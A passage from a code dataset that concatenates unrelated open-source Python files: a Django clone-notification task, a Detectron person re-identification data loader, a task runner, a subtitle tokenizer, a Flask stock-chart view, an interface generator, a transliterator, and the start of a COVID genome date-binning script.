JobStatus.DONE\r\n\r\n except:\r\n log.exception('Clone job failed.')\r\n job.status = JobStatus.FAILED\r\n\r\n finally:\r\n job.save()\r\n\r\n _send_clone_notification(job, validation, validation_id)\r\n\r\n\r\ndef _send_clone_notification(job: CloneJob, validation: Validation, validation_id: int):\r\n cloned_validation = Validation.objects.get(pk=validation_id)\r\n\r\n context = dict(\r\n site_url=job.site_url,\r\n validation_id=validation.id,\r\n validation_name=validation.name,\r\n cloned_val_id=cloned_validation.id,\r\n cloned_val_name=cloned_validation.name,\r\n )\r\n\r\n recipients = []\r\n if job.requester.email:\r\n recipients.append(job.requester.email)\r\n\r\n if job.status == JobStatus.DONE:\r\n template_name = 'collate/clone_success.html'\r\n subject = f\"Reporter: Validation '{validation.name}' is cloned successfully\"\r\n clone_status = 'cloned SUCCESSFULLY'\r\n else:\r\n template_name = 'collate/clone_failure.html'\r\n subject = f\"Reporter: Clone of '{validation.name}' failed\"\r\n recipients += get_user_model().staff_emails()\r\n clone_status = 'FAILED to clone'\r\n\r\n template = get_template(template_name)\r\n text = template.render(context)\r\n\r\n log.debug('Validation with id %d is %s, sending notification message.', validation_id, clone_status)\r\n log.debug('Subject of notification message: %s', subject)\r\n log.debug('Recipients: %s', recipients)\r\n\r\n if production:\r\n message = 
EmailMessage(subject, text, None, recipients)\r\n message.content_subtype = 'html'\r\n message.send()\r\n","sub_path":"backend/reporting/api/collate/tasks/task_clone.py","file_name":"task_clone.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121871854","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport numpy as np\nimport numpy.random as npr\nimport random\nimport os\nimport cv2\nimport math\n\nfrom detectron.core.config import cfg\nimport detectron.modeling.FPN as fpn\nimport detectron.roi_data.keypoint_rcnn as keypoint_rcnn_roi_data\nimport detectron.roi_data.mask_rcnn as mask_rcnn_roi_data\nimport detectron.utils.blob as blob_utils\nimport detectron.utils.boxes as box_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_reid_blob_names(is_training=True):\n\n blob_names = []\n if is_training:\n # labels_int32 blob: R categorical labels in [0, ..., K] for K\n # foreground classes plus background\n blob_names += ['labels_int32']\n blob_names += ['labels_oh']\n if cfg.REID.PSE_ON:\n blob_names += ['attr_labels_int32']\n blob_names += ['weight']\n blob_names += ['attr_weight']\n return blob_names\n \"\"\"Fast R-CNN blob names.\"\"\"\n # rois blob: holds R regions of interest, each is a 5-tuple\n # (batch_idx, x1, y1, x2, y2) specifying an image batch index and a\n # rectangle (x1, y1, x2, y2)\n blob_names = ['rois']\n if is_training:\n # bbox_targets blob: R bounding-box regression targets with 4\n # targets per class\n blob_names += ['bbox_targets']\n # bbox_inside_weights blob: At most 4 targets per roi are active\n # this binary vector sepcifies the subset of active targets\n blob_names += ['bbox_inside_weights']\n blob_names += ['bbox_outside_weights']\n if is_training and cfg.MODEL.MASK_ON:\n # 'mask_rois': RoIs sampled for training the mask prediction branch.\n # Shape is (#masks, 5) in format (batch_idx, x1, y1, x2, y2).\n blob_names += ['mask_rois']\n # 'roi_has_mask': binary labels for the RoIs specified in 'rois'\n # indicating if each RoI has a mask or not. Note that in some cases\n # a *bg* RoI will have an all -1 (ignore) mask associated with it in\n # the case that no fg RoIs can be sampled. Shape is (batchsize).\n blob_names += ['roi_has_mask_int32']\n # 'masks_int32' holds binary masks for the RoIs specified in\n # 'mask_rois'. Shape is (#fg, M * M) where M is the ground truth\n # mask size.\n blob_names += ['masks_int32']\n if is_training and cfg.MODEL.KEYPOINTS_ON:\n # 'keypoint_rois': RoIs sampled for training the keypoint prediction\n # branch. Shape is (#instances, 5) in format (batch_idx, x1, y1, x2,\n # y2).\n blob_names += ['keypoint_rois']\n # 'keypoint_locations_int32': index of keypoint in\n # KRCNN.HEATMAP_SIZE**2 sized array. Shape is (#instances). Used in\n # SoftmaxWithLoss.\n blob_names += ['keypoint_locations_int32']\n # 'keypoint_weights': weight assigned to each target in\n # 'keypoint_locations_int32'. Shape is (#instances). Used in\n # SoftmaxWithLoss.\n blob_names += ['keypoint_weights']\n # 'keypoint_loss_normalizer': optional normalization factor to use if\n # cfg.KRCNN.NORMALIZE_BY_VISIBLE_KEYPOINTS is False.\n blob_names += ['keypoint_loss_normalizer']\n if cfg.FPN.FPN_ON and cfg.FPN.MULTILEVEL_ROIS:\n # Support for FPN multi-level rois without bbox reg isn't\n # implemented (... 
and may never be implemented)\n k_max = cfg.FPN.ROI_MAX_LEVEL\n k_min = cfg.FPN.ROI_MIN_LEVEL\n # Same format as rois blob, but one per FPN level\n for lvl in range(k_min, k_max + 1):\n blob_names += ['rois_fpn' + str(lvl)]\n blob_names += ['rois_idx_restore_int32']\n if is_training:\n if cfg.MODEL.MASK_ON:\n for lvl in range(k_min, k_max + 1):\n blob_names += ['mask_rois_fpn' + str(lvl)]\n blob_names += ['mask_rois_idx_restore_int32']\n if cfg.MODEL.KEYPOINTS_ON:\n for lvl in range(k_min, k_max + 1):\n blob_names += ['keypoint_rois_fpn' + str(lvl)]\n blob_names += ['keypoint_rois_idx_restore_int32']\n return blob_names\n\n\ndef add_reid_blobs(blobs, im_scales, roidb):\n \"\"\"Add blobs needed for training Fast R-CNN style models.\"\"\"\n # Sample training RoIs from each image and append them to the blob lists\n for im_i, entry in enumerate(roidb):\n frcn_blobs = _sample_rois(entry, im_scales[im_i], im_i)\n for k, v in frcn_blobs.items():\n blobs[k].append(v)\n # Concat the training blob lists into tensors\n for k, v in blobs.items():\n if isinstance(v, list) and len(v) > 0:\n blobs[k] = np.concatenate(v)\n\n return True\n\n # Add FPN multilevel training RoIs, if configured\n if cfg.FPN.FPN_ON and cfg.FPN.MULTILEVEL_ROIS:\n _add_multilevel_rois(blobs)\n\n # Perform any final work and validity checks after the collating blobs for\n # all minibatch images\n valid = True\n if cfg.MODEL.KEYPOINTS_ON:\n valid = keypoint_rcnn_roi_data.finalize_keypoint_minibatch(\n blobs, valid)\n\n return valid\n\n\ndef _sample_rois(roidb, im_scale, batch_idx):\n \"\"\"Generate a random sample of RoIs comprising foreground and background\n examples.\n \"\"\"\n if cfg.REID.PSE_ON:\n img_labels = np.array([0], dtype=np.float32)\n attr_img_labels = np.array([0], dtype=np.float32)\n weight = np.array([0.0], dtype=np.float32)\n attr_weight = np.array([0.0], dtype=np.float32)\n\n gt_inds = np.where(roidb['gt_classes'] > 0)[0]\n assert len(gt_inds) <= 2, 'Only one ground truth for image is allowed.'\n gt_classes = roidb['gt_classes'][gt_inds].copy()\n\n gt_inds = np.where(roidb['gt_attributions'] > 0)[0]\n assert len(gt_inds) <= 2, 'Only one ground truth for image is allowed.'\n gt_attributions = roidb['gt_attributions'][gt_inds].copy()\n\n classes_or_attributions = roidb['classes_or_attributions']\n for i in range(len(gt_classes)):\n if classes_or_attributions[i] == 0:\n img_labels[0] = gt_classes[i] - 1\n weight[0] = 1.0\n elif classes_or_attributions[i] == 1:\n attr_img_labels[0] = gt_attributions[i] - 1\n attr_weight[0] = cfg.REID.PSE_WEIGHT\n else:\n img_labels[0] = gt_classes[i] - 1\n weight[0] = 1.0\n attr_img_labels[0] = gt_attributions[i] - 1\n attr_weight[0] = cfg.REID.PSE_WEIGHT\n blob_dict = dict(\n labels_int32=img_labels.astype(np.int32, copy=False),\n attr_labels_int32=attr_img_labels.astype(np.int32, copy=False),\n weight=weight.astype(np.float32, copy=False),\n attr_weight=attr_weight.astype(np.float32, copy=False),\n )\n return blob_dict\n\n # Get image label\n img_labels_oh = np.zeros((1, cfg.MODEL.NUM_CLASSES - 1), dtype=np.float32)\n img_labels = np.zeros((1), dtype=np.float32)\n\n gt_inds = np.where(roidb['gt_classes'] > 0)[0]\n assert len(gt_inds) == 1, 'Only one ground truth for image is allowed.'\n gt_classes = roidb['gt_classes'][gt_inds].copy()\n\n img_labels_oh[0][gt_classes[0] - 1] = 1\n img_labels[0] = gt_classes[0] - 1\n\n blob_dict = dict(\n labels_int32=img_labels.astype(np.int32, copy=False),\n labels_oh=img_labels_oh.astype(np.float32, copy=False),\n )\n return blob_dict\n\n 
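# NOTE: the RoI sampling code below is unreachable after the unconditional return above; it is kept for reference\n    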
rois_per_image = int(cfg.TRAIN.BATCH_SIZE_PER_IM)\n fg_rois_per_image = int(np.round(cfg.TRAIN.FG_FRACTION * rois_per_image))\n max_overlaps = roidb['max_overlaps']\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n fg_inds = np.where(max_overlaps >= cfg.TRAIN.FG_THRESH)[0]\n # Guard against the case when an image has fewer than fg_rois_per_image\n # foreground RoIs\n fg_rois_per_this_image = np.minimum(fg_rois_per_image, fg_inds.size)\n # Sample foreground regions without replacement\n if fg_inds.size > 0:\n fg_inds = npr.choice(\n fg_inds, size=fg_rois_per_this_image, replace=False)\n\n # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)\n bg_inds = np.where((max_overlaps < cfg.TRAIN.BG_THRESH_HI) &\n (max_overlaps >= cfg.TRAIN.BG_THRESH_LO))[0]\n # Compute number of background RoIs to take from this image (guarding\n # against there being fewer than desired)\n bg_rois_per_this_image = rois_per_image - fg_rois_per_this_image\n bg_rois_per_this_image = np.minimum(bg_rois_per_this_image, bg_inds.size)\n # Sample foreground regions without replacement\n if bg_inds.size > 0:\n bg_inds = npr.choice(\n bg_inds, size=bg_rois_per_this_image, replace=False)\n\n # The indices that we're selecting (both fg and bg)\n keep_inds = np.append(fg_inds, bg_inds)\n # Label is the class each RoI has max overlap with\n sampled_labels = roidb['max_classes'][keep_inds]\n sampled_labels[fg_rois_per_this_image:] = 0 # Label bg RoIs with class 0\n sampled_boxes = roidb['boxes'][keep_inds]\n\n bbox_targets, bbox_inside_weights = _expand_bbox_targets(\n roidb['bbox_targets'][keep_inds, :])\n bbox_outside_weights = np.array(\n bbox_inside_weights > 0, dtype=bbox_inside_weights.dtype)\n\n # Scale rois and format as (batch_idx, x1, y1, x2, y2)\n sampled_rois = sampled_boxes * im_scale\n repeated_batch_idx = batch_idx * blob_utils.ones(\n (sampled_rois.shape[0], 1))\n sampled_rois = np.hstack((repeated_batch_idx, sampled_rois))\n\n # Base Fast R-CNN blobs\n blob_dict = dict(\n labels_int32=sampled_labels.astype(np.int32, copy=False),\n rois=sampled_rois,\n bbox_targets=bbox_targets,\n bbox_inside_weights=bbox_inside_weights,\n bbox_outside_weights=bbox_outside_weights)\n\n # Optionally add Mask R-CNN blobs\n if cfg.MODEL.MASK_ON:\n mask_rcnn_roi_data.add_mask_rcnn_blobs(blob_dict, sampled_boxes, roidb,\n im_scale, batch_idx)\n\n # Optionally add Keypoint R-CNN blobs\n if cfg.MODEL.KEYPOINTS_ON:\n keypoint_rcnn_roi_data.add_keypoint_rcnn_blobs(\n blob_dict, roidb, fg_rois_per_image, fg_inds, im_scale, batch_idx)\n\n return blob_dict\n\n\ndef random_crop(im):\n # Randomly crop a sub-image.\n crop_prob = cfg.REID.CROP_PROB\n crop_ratio = cfg.REID.CROP_RATIO\n assert crop_prob <= 1\n assert crop_prob >= 0\n if crop_prob == 0 or np.random.uniform() > crop_prob:\n return im, [0, 0, im.shape[0] - 1, im.shape[1] - 1]\n assert crop_ratio > 0\n assert crop_ratio < 1\n h_ratio = np.random.uniform(crop_ratio, 1)\n w_ratio = np.random.uniform(crop_ratio, 1)\n crop_h = int(im.shape[0] * h_ratio)\n crop_w = int(im.shape[1] * w_ratio)\n h_start = np.random.randint(0, im.shape[0] - crop_h)\n w_start = np.random.randint(0, im.shape[1] - crop_w)\n im = np.copy(im[h_start:h_start + crop_h, w_start:w_start + crop_w, :])\n\n im_crop = [h_start, w_start, h_start + crop_h - 1, w_start + crop_w - 1]\n return im, im_crop\n\n\ndef horizontal_crop(im):\n horizontal_crop_prob = cfg.REID.HORIZONTAL_CROP_PROB\n horizontal_crop_ratio = cfg.REID.HORIZONTAL_CROP_RATIO\n # Horizontal Crop\n if ((horizontal_crop_ratio < 
1) and (horizontal_crop_prob > 0)\n and (np.random.uniform() < horizontal_crop_prob)\n and im.shape[0] * 1.0 / im.shape[1] > 1.5):\n h_ratio = np.random.uniform(horizontal_crop_ratio, 1)\n crop_h = int(im.shape[0] * h_ratio)\n im = im[0:crop_h]\n\n return im, [0, 0, crop_h - 1, im.shape[1] - 1]\n else:\n return im, [0, 0, im.shape[0] - 1, im.shape[1] - 1]\n\n\n# Do not use it\n# padding image to 3:1 before resizing\ndef fix_rate(img):\n if not cfg.REID.FIX_RATE:\n return img\n\n h = img.shape[0]\n w = img.shape[1]\n #print \"h:%d,w:%d\" % (h, w)\n if float(h) / float(w) <= 3:\n out_img = np.random.uniform(0, 1, size=(3 * w, w, 3))\n out_img[0:3 * w, 0:w, 0] = self.im_mean[0] * 255\n out_img[0:3 * w, 0:w, 1] = self.im_mean[1] * 255\n out_img[0:3 * w, 0:w, 2] = self.im_mean[2] * 255\n else:\n out_img = np.random.uniform(0, 1, size=(h, int(h / 3), 3))\n out_img[0:h, 0:int(h / 3), 0] = self.im_mean[0] * 255\n out_img[0:h, 0:int(h / 3), 1] = self.im_mean[1] * 255\n out_img[0:h, 0:int(h / 3), 2] = self.im_mean[2] * 255\n h_o = out_img.shape[0]\n w_o = out_img.shape[1]\n delta_h = (h_o - h) / 2\n delta_w = (w_o - w) / 2\n #print \"delta_h: %d,delta_w: %d\" % (delta_h,delta_w)\n #print \"h_o:%d w_o: %d\" % (h_o,w_o)\n out_img[delta_h:h + delta_h, delta_w:w + delta_w, :] = img\n return out_img\n\n\ndef hsv_jitter(im):\n hsv_jitter_prob = cfg.REID.HSV_JITTER_PROB\n assert hsv_jitter_prob <= 1\n assert hsv_jitter_prob >= 0\n\n if hsv_jitter_prob == 0 or np.random.uniform() > hsv_jitter_prob:\n return im\n\n saturation_range = cfg.REID.SATURATION_RANGE\n hue_range = cfg.REID.HUE_RANGE\n value_range = cfg.REID.VALUE_RANGE\n\n im_hsv = cv2.cvtColor(im, cv2.COLOR_RGB2HSV).astype(np.int)\n #saturation\n if saturation_range > 0:\n offset = np.random.randint(-saturation_range, saturation_range)\n #print offset\n im_hsv[:, :, 1] = im_hsv[:, :, 1] + offset\n\n #hue\n if hue_range > 0:\n offset = np.random.randint(-hue_range, hue_range)\n #print offset\n im_hsv[:, :, 0] = im_hsv[:, :, 0] + offset\n\n #value\n if value_range > 0:\n offset = np.random.randint(-value_range, value_range)\n #print offset\n im_hsv[:, :, 2] = im_hsv[:, :, 2] + offset\n\n im_hsv = np.clip(im_hsv, 0, 255).astype(np.uint8)\n im_rgb = cv2.cvtColor(im_hsv, cv2.COLOR_HSV2RGB)\n return im_rgb\n\n\ndef gaussian_blur(im):\n gaussian_blur_prob = cfg.REID.GAUSSIAN_BLUR_PROB\n gaussian_blur_kernel = cfg.REID.GAUSSIAN_BLUR_KERNEL\n if gaussian_blur_prob == 0 or np.random.uniform() > gaussian_blur_prob:\n return im\n\n sizes = range(1, gaussian_blur_kernel, 2)\n kernel_size = random.sample(sizes, 1)[0]\n im = cv2.GaussianBlur(im, (kernel_size, kernel_size), 0)\n return im\n\n\ndef random_erasing(img):\n random_erasing_prob = cfg.REID.RANDOM_ERASING_PROB\n sl = cfg.REID.SL\n sh = cfg.REID.SH\n r1 = cfg.REID.R1\n if random_erasing_prob == 0 or np.random.uniform(0,\n 1) > random_erasing_prob:\n return img\n\n for attempt in range(100):\n area = img.shape[0] * img.shape[1]\n target_area = np.random.uniform(sl, sh) * area\n aspect_ratio = np.random.uniform(r1, 1.0 / r1)\n\n h = int(round(math.sqrt(target_area * aspect_ratio)))\n w = int(round(math.sqrt(target_area / aspect_ratio)))\n\n #rate = 1\n if w < img.shape[1] and h < img.shape[0]:\n x1 = random.randint(0, img.shape[0] - h)\n y1 = random.randint(0, img.shape[1] - w)\n if img.shape[2] == 3:\n img[x1:x1 + h, y1:y1 + w, 0] = cfg.PIXEL_MEANS[0, 0, 0]\n img[x1:x1 + h, y1:y1 + w, 1] = cfg.PIXEL_MEANS[0, 0, 1]\n img[x1:x1 + h, y1:y1 + w, 2] = cfg.PIXEL_MEANS[0, 0, 2]\n else:\n img[x1:x1 + h, y1:y1 + w, 
0] = cfg.PIXEL_MEANS[0, 0, 0]\n return img\n return img\n\n\ndef save_image(img, name):\n output_dir = cfg.OUTPUT_DIR\n\n cv2.imwrite(os.path.join(output_dir, name + '.png'), img)\n\n\ndef _expand_bbox_targets(bbox_target_data):\n \"\"\"Bounding-box regression targets are stored in a compact form in the\n roidb.\n\n This function expands those targets into the 4-of-4*K representation used\n by the network (i.e. only one class has non-zero targets). The loss weights\n are similarly expanded.\n\n Returns:\n bbox_target_data (ndarray): N x 4K blob of regression targets\n bbox_inside_weights (ndarray): N x 4K blob of loss weights\n \"\"\"\n num_bbox_reg_classes = cfg.MODEL.NUM_CLASSES\n if cfg.MODEL.CLS_AGNOSTIC_BBOX_REG:\n num_bbox_reg_classes = 2 # bg and fg\n\n clss = bbox_target_data[:, 0]\n bbox_targets = blob_utils.zeros((clss.size, 4 * num_bbox_reg_classes))\n bbox_inside_weights = blob_utils.zeros(bbox_targets.shape)\n inds = np.where(clss > 0)[0]\n for ind in inds:\n cls = int(clss[ind])\n start = 4 * cls\n end = start + 4\n bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]\n bbox_inside_weights[ind, start:end] = (1.0, 1.0, 1.0, 1.0)\n return bbox_targets, bbox_inside_weights\n\n\ndef _add_multilevel_rois(blobs):\n \"\"\"By default training RoIs are added for a single feature map level only.\n When using FPN, the RoIs must be distributed over different FPN levels\n according the level assignment heuristic (see: modeling.FPN.\n map_rois_to_fpn_levels).\n \"\"\"\n lvl_min = cfg.FPN.ROI_MIN_LEVEL\n lvl_max = cfg.FPN.ROI_MAX_LEVEL\n\n def _distribute_rois_over_fpn_levels(rois_blob_name):\n \"\"\"Distribute rois over the different FPN levels.\"\"\"\n # Get target level for each roi\n # Recall blob rois are in (batch_idx, x1, y1, x2, y2) format, hence take\n # the box coordinates from columns 1:5\n target_lvls = fpn.map_rois_to_fpn_levels(blobs[rois_blob_name][:, 1:5],\n lvl_min, lvl_max)\n # Add per FPN level roi blobs named like: _fpn\n fpn.add_multilevel_roi_blobs(blobs, rois_blob_name,\n blobs[rois_blob_name], target_lvls,\n lvl_min, lvl_max)\n\n _distribute_rois_over_fpn_levels('rois')\n if cfg.MODEL.MASK_ON:\n _distribute_rois_over_fpn_levels('mask_rois')\n if cfg.MODEL.KEYPOINTS_ON:\n _distribute_rois_over_fpn_levels('keypoint_rois')\n","sub_path":"detectron/roi_data/reid.py","file_name":"reid.py","file_ext":"py","file_size_in_byte":17874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453172089","text":"import os, sys\nimport logging\nimport uuid\nimport json\nimport asyncio\nimport argparse\n\nfrom aiobbox.exceptions import Stop\nimport aiobbox.server as bbox_server\nfrom aiobbox.cluster import get_box, get_cluster, get_ticket\nfrom aiobbox.utils import import_module\nfrom aiobbox.handler import BaseHandler\n\nlogger = logging.getLogger('bbox')\n\nclass Handler(BaseHandler):\n help = 'run bbox tasks'\n def add_arguments(self, parser):\n parser.add_argument(\n 'module',\n type=str,\n help='the task module to load')\n\n parser.add_argument(\n 'task_params',\n type=str,\n nargs='*',\n help='task arguments')\n\n async def run(self, args):\n cfg = get_ticket()\n if cfg.language != 'python3':\n print('language must be python3', file=sys.stderr)\n sys.exit(1)\n\n mod = import_module(args.module)\n\n if hasattr(mod, 'Handler'):\n handler = mod.Handler()\n else:\n handler = BaseHandler()\n\n parser = argparse.ArgumentParser(prog='bbox.py run')\n handler.add_arguments(parser)\n sub_args = parser.parse_args(args.task_params)\n 
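# start the cluster, run the task handler, and always shut the cluster down in the finally block\n        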
try:\n            await get_cluster().start()\n            r = await handler.run(sub_args)\n            if r:\n                logger.debug('task return %s', r)\n        finally:\n            c = get_cluster()\n            c.cont = False\n            await asyncio.sleep(0.1)\n            c.close()\n\n","sub_path":"aiobbox/tools/runtask.py","file_name":"runtask.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81980350","text":"# -*- coding: utf-8 -*-\nimport pysrt\nimport re\n\n\ndef open_doc(source_text):\n    try:\n        subs = pysrt.open(source_text)\n        return subs\n    except UnicodeDecodeError:\n        subs = pysrt.open(source_text, encoding='iso-8859-1')\n        return subs\n\n\ndef sanitize(subs):\n    sanitized = \"\"\n\n    for sub in subs:\n        sanitized += sub.text + \"\\n\"\n\n    return sanitized\n\n\ndef concatenate_string_to_file(text, path):\n    # append the sanitized text to the corpus file and release the handle\n    corpus = open(path, \"a\")\n    corpus.write(text)\n    corpus.close()\n\n\ndef tokenize_and_clean_subs(sanitized_subs):\n    p = \"(?:'([\wÀ-ÿ]+[\'\-]?[\wÀ-ÿ]*)'|((?:[\wÀ-ÿ]+[\'\-]?[\wÀ-ÿ]*[\'\-]?\"\\\n        \")+)|((?:'?[\wÀ-ÿ]+[\'\-]?[\wÀ-ÿ]*)+))\"\n    pattern = re.compile(p)\n    return pattern.findall(sanitized_subs)\n\n\nsubs = open_doc(\"Reservoir Dogs.srt\")\nsanitized_subs = sanitize(subs)\nprint(tokenize_and_clean_subs(sanitized_subs))\n","sub_path":"Util/srt_sanitizer.py","file_name":"srt_sanitizer.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388182938","text":"from flask import render_template\n\nfrom stocks import app, graph\nfrom stocks.graph import BadTickerException\nfrom flask.ext.wtf import Form\nfrom wtforms import StringField\n\nfrom decorators import nocache\n\nclass TickerForm(Form):\n    ticker = StringField('')\n\n    def validate(self):\n        return Form.validate(self)\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n    # Turn this into a field on the webpage for users to enter a ticker\n    tickerIsBad = False\n    form = TickerForm()\n    if form.validate_on_submit():\n        ticker = form.data['ticker']\n\n        # ticker = \"CHRIS/CME_CL1\"\n        if not ticker:\n            tickerIsBad = True\n        else:\n            try:\n                graph.graphData(ticker)\n            except BadTickerException:\n                tickerIsBad = True\n        \n        # return app.send_static_file(\"index.html\")\n        return render_template(\"index.html\", form=form, badTicker=tickerIsBad, ticker=ticker)\n    return render_template(\"index.html\", form=form) \n\n@app.route(\"/\", methods=[\"GET\"])\ndef get_chart():\n    return app.send_static_file(\"chart.png\")\n","sub_path":"stocks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"599429733","text":"#!/usr/bin/env python\n\n__author__ = 'Adam R. 
Smith'\n__license__ = 'Apache 2.0'\n\nfrom anode.base import obj_registry\n\nfrom collections import OrderedDict\nimport datetime\nimport fnmatch\nimport os\nimport re\nimport sys\nimport argparse\n\nimport yaml\n\ntemplates = {\n 'file':\n'''#!/usr/bin/env python\n\nfrom zope.interface import Interface\n\n{classes}\n'''\n , 'class':\n'''class I{name}(Interface):\n{methods}\n'''\n , 'method':\n'''\n def {name}({args}):\n pass\n'''\n , 'arg': '{name}={val}'\n}\n\ndescription = 'Anode utility for generating interfaces from object definitions (and vice versa).'\nparser = argparse.ArgumentParser(description=description)\nparser.add_argument('action', type=str, default='generate', choices=['generate'], help='Which action to perform.')\nargs = parser.parse_args()\n\nif os.getcwd().endswith('scripts'):\n sys.exit('This script needs to be run from the anode root.')\n\nif args.action == 'generate':\n service_dir, interface_dir = 'obj/services', 'interface'\n if not os.path.exists(interface_dir):\n os.makedirs(interface_dir)\n\n # Clear old generated files\n files = os.listdir(interface_dir)\n for file in fnmatch.filter(files, '*.py') + fnmatch.filter(files, '*.pyc'):\n os.unlink(os.path.join(interface_dir, file))\n\n open(os.path.join(interface_dir, '__init__.py'), 'w').close()\n\n # Generate the new definitions, for now giving each yaml file its own python service\n file_re = re.compile('(obj)/(.*)[.](yml)')\n for root, dirs, files in os.walk(service_dir):\n for filename in fnmatch.filter(files, '*.yml'):\n yaml_file = os.path.join(root, filename)\n file_match = file_re.match(yaml_file)\n if file_match is None: continue\n\n interface_name = file_match.group(2).rsplit(os.sep)[-1]\n interface_file = file_re.sub(r'interface/\\2.py', yaml_file)\n\n parent_dir = os.path.dirname(interface_file)\n if not os.path.exists(parent_dir):\n os.makedirs(parent_dir)\n\n methods = []\n yaml_text = open(yaml_file, 'r').read()\n defs = yaml.load_all(yaml_text)\n for def_set in defs:\n for name,_def in def_set.iteritems():\n # TODO: Handle more than one definition version for the same object type\n\n args = []\n for key,val in _def.iteritems():\n if isinstance(val, basestring):\n val = \"'%s'\" % (val)\n elif isinstance(val, datetime.datetime):\n # TODO: generate the datetime code\n val = \"'%s'\" % (val)\n elif isinstance(val, OrderedDict):\n val = dict(val)\n args.append(templates['arg'].format(name=key, val=val))\n args_str = ', '.join(args)\n\n methods.append(templates['method'].format(name=name, args=args_str))\n\n methods_str = ''.join(methods)\n class_name = interface_name.title().replace('_', '').replace('-', '')\n _class = templates['class'].format(name=class_name, methods=methods_str)\n\n interface_contents = templates['file'].format(classes=_class)\n open(interface_file, 'w').write(interface_contents)\n\n\n","sub_path":"scripts/anode-obj.py","file_name":"anode-obj.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600153479","text":"def normalize(input_text):\n\n сyrillic_alphabet = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n latin_alphabet = ['a', 'b', 'v', 'g', 'd', 'e', 'ye', 'zh', 'z', 'i', 'y', 'k', 'l', 'm', 'n', 'o',\n 'p', 'r', 's', 't', 'u', 'f', 'kh', 'ts', 'ch', 'sh', 'shch', None, 'y', None, 'e', 'yu', 'ya']\n map = {}\n\n for index in range(len(сyrillic_alphabet)):\n\n сyrillic_letter_lower = ord(сyrillic_alphabet[index])\n map[сyrillic_letter_lower] = latin_alphabet[index]\n\n for index in 
range(len(сyrillic_alphabet)):\n\n сyrillic_letter_upper = ord(сyrillic_alphabet[index].upper())\n\n if latin_alphabet[index]:\n map[сyrillic_letter_upper] = latin_alphabet[index].capitalize()\n\n elif latin_alphabet[index] is None:\n map[сyrillic_letter_upper] = latin_alphabet[index]\n\n translated_text = input_text.translate(map)\n\n transliteration = ''\n\n for i in translated_text:\n if i.isalnum():\n transliteration += i\n else:\n transliteration += '_'\n\n return transliteration\n\n\ndef main():\n input_text = input()\n print(normalize(input_text))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"module_06/hw_5.py","file_name":"hw_5.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"252938500","text":"import sys, os\nimport genome_data_processing as gdp\nimport ecc_tools as tools\nimport timeit\n# import pydca-ER module\nimport matplotlib\n#matplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom scipy import linalg\nfrom sklearn.preprocessing import OneHotEncoder\nimport expectation_reflection as ER\nfrom direct_info import direct_info\nfrom direct_info import sort_di\nfrom joblib import Parallel, delayed\nimport numpy as np\nimport pickle\nfrom gen_ROC_jobID_df import add_ROC\n\n#singularity exec -B /data/cresswellclayec/DCA_ER/biowulf/,/data/cresswellclayec/DCA_ER/covid_proteins /data/cresswellclayec/DCA_ER/LADER.simg python get_chrono.py G_aligned.fasta\n\n#aligned_fasta = 'covid_genome_full_aligned.fasta'\naligned_fasta = sys.argv[1] # clade aligned file\ndata_path = '/data/cresswellclayec/DCA_ER/covid_proteins/'\nroot_dir = '/data/cresswellclayec/DCA_ER/covid_proteins/'\ndata_out = '/data/cresswellclayec/DCA_ER/covid_proteins/cov_fasta_files/'\n\n#sample ID.. want to extract and bin bassed off of time.\n#>2020-04-20|Europe/UnitedKingdom/Wales|EPI_ISL_446771\n\n#import re\n#subject_genome = re.sub(\".fasta\",\"\",subject_genome_file)\n\nnucleotide_letters_full = np.array(['A','C','G','T','N','R','Y','S','W','K','M','B','D','H','V','U','-'])\n\n\n\ndef create_bins(lower_bound, width, quantity):\n \"\"\" create_bins returns an equal-width (distance) partitioning. \n It returns an ascending list of tuples, representing the intervals.\n A tuple bins[i], i.e. 
(bins[i][0], bins[i][1]) with i > 0 \n    and i < quantity, satisfies the following conditions:\n        (1) bins[i][0] + width == bins[i][1]\n        (2) bins[i-1][0] + width == bins[i][0] and\n            bins[i-1][1] + width == bins[i][1]\n    \"\"\"\n    \n\n    bins = []\n    for low in range(lower_bound, \n                     lower_bound + quantity*width + 1, width):\n        bins.append((low,low+width))\n    return bins\n\ndef find_bin(value, bins):\n    \"\"\" bins is a list of tuples, like [(0,20), (20, 40), (40, 60)],\n        binning returns the smallest index i of bins so that\n        bin[i][0] <= value < bin[i][1]\n    \"\"\"\n    \n    for i in range(0, len(bins)):\n        if bins[i][0] <= value < bins[i][1]:\n            return i\n    return -1 \n\nfrom Bio import SeqIO\nimport time\nimport datetime\nimport math\n\n\ndates = []\ntimestmp = []\nstmps = []\nbad_time_count = 0\nwith open(aligned_fasta,\"r\") as handle:\n\tfor i,record in enumerate(SeqIO.parse(handle, \"fasta\")):\n\t\t#print('record %d '%(i))\n\t\t#print('record date: ', 